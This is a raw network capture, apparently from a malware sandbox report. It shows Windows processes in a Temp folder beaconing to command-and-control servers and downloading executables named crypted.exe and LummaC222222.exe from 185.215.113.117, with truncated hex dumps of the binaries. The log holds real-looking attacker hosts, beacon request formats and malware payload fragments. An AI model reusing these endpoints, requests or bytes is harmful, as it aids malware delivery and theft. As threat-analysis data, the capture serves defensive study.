Sep 27, 2024 04:21:21.116650105 CEST	1236	IN	Data Raw: 00 0a 2a 2e 00 fe 09 00 00 28 34 00 00 0a 2a 2a fe 09 00 00 6f 35 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 39 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 1a 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 59 00 00 0a 2a 2e 00 fe 09 00 00 28 Data Ascii: .(4o5:o9:o>(Y.(LN(_>(R0s,_~2((e(f`~2((e(f(49~b(og(49
Sep 27, 2024 04:21:21.116660118 CEST	1236	IN	Data Raw: 26 20 06 00 00 00 38 62 fe ff ff 11 03 3a d3 fe ff ff 20 07 00 00 00 38 51 fe ff ff 00 11 02 6f 71 00 00 0a 1f 64 7e 32 03 00 04 28 bf 05 00 06 28 36 00 00 06 13 0d 20 04 00 00 00 7e 2e 03 00 04 7b e6 02 00 04 3a 22 fe ff ff 26 20 02 00 00 00 38 Data Ascii: & 8b: 8Qoqd~2((6 ~.{:"& 898k8 ~.{:& 8ootA88wu' ~.{:& 8E7+82o1 ~.{:
Sep 27, 2024 04:21:21.116671085 CEST	1236	IN	Data Raw: 03 00 04 28 e3 05 00 06 00 25 73 2e 00 00 0a 7e 3c 03 00 04 28 e7 05 00 06 00 13 07 11 07 7e 41 03 00 04 28 fb 05 00 06 16 fe 01 13 09 11 09 39 09 00 00 00 06 11 07 6f 2f 00 00 0a 00 00 12 03 28 30 00 00 0a 3a e4 fe ff ff dd 0f 00 00 00 12 03 fe Data Ascii: (%s.~<(~A(9o/(0:o1&o2:9o18*Adn&De7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49729	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:20.639245033 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:21.314498901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:21.327826023 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:21.555485010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49730	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:21.670361996 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:22.369586945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:22.764954090 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:22.992566109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49731	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:22.772140026 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000254001&unit=246122658369
Sep 27, 2024 04:21:23.491058111 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49732	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:23.270159960 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:23.985779047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:23.989104986 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:24.228287935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49733	185.215.113.117	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:23.535099030 CEST	56	OUT	GET /inc/crypted.exe HTTP/1.1 Host: 185.215.113.117
Sep 27, 2024 04:21:24.234410048 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:24 GMT Content-Type: application/octet-stream Content-Length: 321536 Last-Modified: Mon, 16 Sep 2024 13:46:13 GMT Connection: keep-alive ETag: "66e836a5-4e800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL&f @ @`W \| H.text `.rsrc@@.reloc @BHh7c73wV)J.:aW'=\|Q&pIIoOgQP~CMv@PSla=:u?ED"Jp2rBH?v0]2>F}s6N.h#Z6g^guaW&2n?vS}!^Ehdpfc4{/OIvQ,U>xKcD/E7.TtyfSC)Fm"2Ms3"KLezcBb-l\TYQB!?e]4/(554'[g
Sep 27, 2024 04:21:24.234424114 CEST	1236	IN	Data Raw: 24 0a b7 15 e6 e6 67 62 3b 65 aa ea 51 d3 e0 72 e5 85 91 47 65 28 61 3c c6 e3 9a 71 43 8c 4a d6 1e 77 03 81 ea 51 99 dc 19 df 94 c3 12 af 4a 2c 8a d2 c2 fb 79 62 77 d3 2e 49 7d 94 40 dd 1c 85 7b 6f d0 74 97 aa 82 15 82 74 3e dc 96 82 76 9f bc 4b Data Ascii: $gb;eQrGe(a<qCJwQJ,ybw.I}@{ott>vK@)X8R@["kQR[l*SvtSys)jK,z%8Ql]T8zGc]V3E'=Ss2^aq>pBI#t0= !ur;G\v?kLa-U
Sep 27, 2024 04:21:24.234435081 CEST	1236	IN	Data Raw: e0 0d 4b c5 22 19 ad 7c af 12 cc 22 0d 91 1f ed 91 eb 12 c9 43 26 10 79 f5 1b 4a e1 53 6a a4 9d 5f 70 bf a7 8c 40 c0 f8 3a b0 e5 48 e0 67 b8 73 38 c2 d2 20 d2 c3 7e 8b 9c 28 c4 8c 31 c4 54 16 a7 47 4d 2b 9b b2 61 47 fa f6 ba e4 1e 18 67 00 6b a1 Data Ascii: K"\|"C&yJSj_p@:Hgs8 ~(1TGM+aGgk5J5&@9Q"Nm.InA<"1]pNG\|<<!/vh=c;MVx&M6&)~2g75`L8.d#NGPy
Sep 27, 2024 04:21:24.234453917 CEST	1236	IN	Data Raw: 63 4e 1a 75 8a ee e7 70 75 8f 79 e3 f1 89 ab b3 a7 5b e4 99 c8 f4 ff 8a 2f f7 bc f2 43 76 06 8a e4 b4 c6 ab cb 41 2d 56 3f 22 b9 21 72 a6 23 92 8e 0d 02 c7 db 8f 94 97 71 97 87 5a eb fa 33 b6 e4 77 27 bb 73 4a db c9 ee 5f a0 2d d0 fe 9d 9c 4b d6 Data Ascii: cNupuy[/CvA-V?"!r#qZ3w'sJ_-K9J74;`]1<+qL`5hKCRcA(h6)NGf4JKP"@jW4X.("9uOLD(Xqn#ma89
Sep 27, 2024 04:21:24.234464884 CEST	896	IN	Data Raw: 20 e7 74 af 19 88 4b 99 b4 e3 5c 6d 68 eb 72 c6 ab 5d 43 7f db 25 fc 12 c2 7a a6 8f f1 90 cc b8 ab 7f 1f 13 c4 aa a0 78 0e 67 94 68 c0 f0 be 87 2e 9e 2f 4e f5 17 8e af dd 0b ba d6 20 66 5f f8 05 4b 8d 8e df 52 5f c7 76 12 44 30 22 5c b0 08 20 26 Data Ascii: tK\mhr]C%zxgh./N f_KR_vD0"\ &U3(xuvjGmvf(.uOKM~`!mfUspYE>/{:b@&4l")8]t`ZwpBf9Lrh
Sep 27, 2024 04:21:24.234476089 CEST	1236	IN	Data Raw: 89 ab 58 97 05 b5 25 71 5c 76 08 90 e9 2c 29 26 9c 03 06 98 f8 27 6a ef 0c 57 21 a3 43 aa 2b 03 ed 58 9b 2f 34 d2 82 50 93 77 99 19 96 fd 12 3b 01 64 92 47 2c 71 74 62 7a 93 83 6d ac 4f 86 c8 d7 5e 7d 92 9d eb e4 b7 73 2e 8f ab 59 7c d0 cb e2 fd Data Ascii: X%q\v,)&'jW!C+X/4Pw;dG,qtbzmO^}s.Y\|<n'0S0s_OKo}"\|AawQsLl3H~?SuvxeWA&Z6[6Mb/\|IOo>4MaLkK6'kpNiDT
Sep 27, 2024 04:21:24.234487057 CEST	1236	IN	Data Raw: 24 f0 7d a3 92 80 45 df 9f 6d 0f 3e 56 f1 2f 23 61 38 c6 ad 57 2b 8e cd fe 91 a4 c0 de 7b 21 a5 97 52 e5 cd 85 76 55 0f a2 11 1a 0c 89 55 e1 85 f0 d0 8d 75 3e 8a 0f b1 b0 87 3b 80 b4 37 60 b6 45 4e a7 7a 46 59 1d 47 35 e6 b9 aa 2d 41 b3 8f 09 03 Data Ascii: $}Em>V/#a8W+{!RvUUu>;7`ENzFYG5-AB7G'O4F*)zgdn"_5q.5#yzH_$!:s\|X[j=Tx_Tv%5!7AGnNFei8"olJ^rlsqMcJ
Sep 27, 2024 04:21:24.234499931 CEST	1236	IN	Data Raw: 7a 20 9f f6 95 eb 2b a0 fa b5 5c d6 c4 de ff 70 f4 7c ec 4e 65 3f f8 f9 f4 5a 2d fa e9 c9 9a 83 f9 9d f8 8f 88 95 eb 9f f6 25 75 5d dc 40 1b bb 4f 68 b8 ca e1 72 7b 5d 2e 39 ca 1a 32 28 20 af 59 31 98 cf 4c a1 32 69 dd 55 00 9d d4 1b c5 92 fb f8 Data Ascii: z +\p\|Ne?Z-%u]@Ohr{].92( Y1L2iUP-]D)xUW\y{MnU!LvF6Ic"G'qc6,gF#AS({b})s~LoGm,yBa>WWgh+#m.oL/Xj-^5
Sep 27, 2024 04:21:24.234544992 CEST	1236	IN	Data Raw: 59 b6 d0 d8 ff 52 9b 83 20 ab 9b 81 dd 74 17 3c 02 75 5b 1d 19 41 0c a6 5e 43 16 e6 1e 69 73 4e 8c 6c 6f f0 18 29 fd 29 55 65 8f d2 bc 8d d9 8d fe be bb b6 b2 10 d2 30 21 0b ca ea 91 4c 40 ae c9 ee 91 36 7b bb 00 46 f7 25 30 67 7a 55 65 e0 59 de Data Ascii: YR t<u[A^CisNlo))Ue0!L@6{F%0gzUeYsZvYrox[,;h"]&0=@&yO/]^['{J M4*;<`^8p#7T\E::f?!1zfo[vL<_X
Sep 27, 2024 04:21:24.234558105 CEST	1236	IN	Data Raw: d8 f5 30 7f 05 7b fd 9f 7f ef 9f 0c 7c 30 f2 6a 72 33 9b 8d ca 08 09 05 2f db d6 83 12 25 a7 08 35 ce a6 d0 ae 56 e0 ce 8e 26 76 a1 5c 17 41 ae 46 67 73 20 a0 ac c4 82 ff e9 79 22 d2 4e 83 5e 1a 93 b1 87 11 ff af 6b 96 a3 92 22 69 8e df 8b 71 95 Data Ascii: 0{\|0jr3/%5V&v\AFgs y"N^k"iq)w3=>]TY_X+8?^WkbSl;K1/i)zw*AdFt6\|rsJvSH0CK:\varXBDLOb+zSS~:}
Sep 27, 2024 04:21:24.239413023 CEST	1236	IN	Data Raw: 09 8c 75 b4 94 12 b8 5a ff 76 0c 8c 54 2d d1 de ad eb ba 4f 73 04 e9 f1 29 b4 15 8a 37 19 40 79 0b a0 60 6b 14 30 f0 f6 8d c1 c3 3f ce bb 1f c2 be c1 99 eb 90 6a a9 85 80 50 ed 28 95 f5 f4 66 74 46 5a 23 19 b3 4c 27 0a cb b8 33 81 81 86 ce 66 0f Data Ascii: uZvT-Os)7@y`k0?jP(ftFZ#L'3faG>LPGTJFofnKO{+^tkxWtPg?Pb[S~x&{,yT@Lf`{(r1o#zY\|afG<2pXJ1Ik4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49736	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:24.355401039 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:25.066842079 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:25.395005941 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:25.632916927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49737	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:25.767400980 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:26.481929064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:26.493500948 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:26.725404024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49738	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:25.859637976 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Sep 27, 2024 04:21:26.562638044 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49740	185.215.113.117	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:26.633996964 CEST	61	OUT	GET /inc/LummaC222222.exe HTTP/1.1 Host: 185.215.113.117
Sep 27, 2024 04:21:27.329622030 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:27 GMT Content-Type: application/octet-stream Content-Length: 360448 Last-Modified: Mon, 23 Sep 2024 14:42:37 GMT Connection: keep-alive ETag: "66f17e5d-58000" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<f@@@xH.text `.rdata)*@@.dataX^@.relocHJ6@B
Sep 27, 2024 04:21:27.329636097 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 83 e4 f8 81 ec 68 02 00 00 8b 45 18 89 44 24 28 8b 45 14 8b 7d Data Ascii: USWVhED$(E}D$LG@t$,tud)0Cu(
Sep 27, 2024 04:21:27.329653025 CEST	1236	IN	Data Raw: c2 f7 d2 8d b0 ff fe fe fe 21 d6 f7 c6 80 80 80 80 75 18 83 7d 08 00 74 be 83 f9 04 7d b9 90 90 90 90 90 90 90 90 90 3c 25 74 55 84 c0 8b 74 24 2c 0f 84 6f 27 00 00 83 7d 08 00 0f 84 46 ff ff ff 89 fa f7 d2 21 f2 89 f1 f7 d1 21 f9 29 d1 81 f9 ff Data Ascii: !u}t}<%tUt$,o'}F!!),L$LQuVUW'1)AAP?w[$dDAAA@AuAAu
Sep 27, 2024 04:21:27.329663992 CEST	1236	IN	Data Raw: 54 24 18 89 f3 89 f1 90 90 90 90 90 90 90 90 90 90 90 90 8b 74 24 0c 80 7c 32 ff 30 0f 85 f5 09 00 00 4e 8d 41 ff 89 74 24 0c 83 fe 02 0f 82 e6 09 00 00 83 f9 01 89 c1 75 d9 e9 da 09 00 00 88 44 24 45 b0 01 89 44 24 04 89 d1 81 f1 00 00 f0 ff 89 Data Ascii: T$t$\|20NAt$uD$ED$!\$uT$L$0gD$$$\|$tD$$T$0D$D$$H;L$vT$JD$$
Sep 27, 2024 04:21:27.329679012 CEST	1236	IN	Data Raw: 85 c9 74 04 89 44 24 0c 8b 5c 24 04 8b 44 24 0c e9 8e 11 00 00 88 94 24 63 02 00 00 c7 44 24 24 01 00 00 00 c6 44 24 44 00 c6 44 24 38 00 c7 44 24 40 00 00 00 00 c7 44 24 10 00 00 00 00 8d 9c 24 63 02 00 00 c7 44 24 1c 00 00 00 00 c7 44 24 0c 00 Data Ascii: tD$\$D$$cD$$D$DD$8D$@D$$cD$D$1D$4n\$L$(L$($cD$$D$DD$8D$@D$$cD$(D$(T$(L$L)T$(y2[D$PY
Sep 27, 2024 04:21:27.329689980 CEST	1236	IN	Data Raw: 45 20 c1 0f b6 c1 01 c6 8d 1c 34 83 c3 64 8d 86 00 fe ff ff f7 d8 89 44 24 24 81 fe 00 02 00 00 75 12 c6 43 ff 30 4b c7 44 24 24 01 00 00 00 b8 01 00 00 00 83 7c 24 14 00 7f 08 c7 44 24 14 00 00 00 00 c7 44 24 0c 00 00 00 00 89 c1 81 e1 00 00 00 Data Ascii: E 4dD$$uC0KD$$\|$D$D$5HD$T$D$(L$L$$L$@\|#9)L$D$\$L$9~IL$\$D$rD$\$$\|$
